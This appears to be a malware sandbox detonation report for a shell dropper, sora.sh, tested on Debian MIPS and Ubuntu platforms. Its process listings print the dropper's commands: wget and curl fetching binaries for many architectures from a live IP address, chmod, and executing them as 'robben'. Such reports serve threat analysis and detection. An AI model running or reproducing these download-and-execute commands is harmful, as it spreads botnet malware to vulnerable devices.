| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x robben sora.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-VTggM8]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x robben sora.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-VTggM8]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/bin/cat
[cat i586]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/bin/cat
[cat i686]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-08-22 21:52
Reported
2024-08-23 00:21
Platform
debian9-mipsbe-20240418-en
Max time kernel
88s
Max time network
89s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x robben sora.sh systemd-private-0d943617c3824028a7503bbf4990add1-systemd-timedated.service-Hq7bX9]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x robben sora.sh systemd-private-0d943617c3824028a7503bbf4990add1-systemd-timedated.service-Hq7bX9]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x robben sora.sh systemd-private-0d943617c3824028a7503bbf4990add1-systemd-timedated.service-Hq7bX9]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/bin/cat
[cat i586]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/bin/cat
[cat i686]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp |
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-08-22 21:52
Reported
2024-08-23 00:31
Platform
ubuntu2204-amd64-20240522.1-en
Max time kernel
196s
Max time network
385s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp |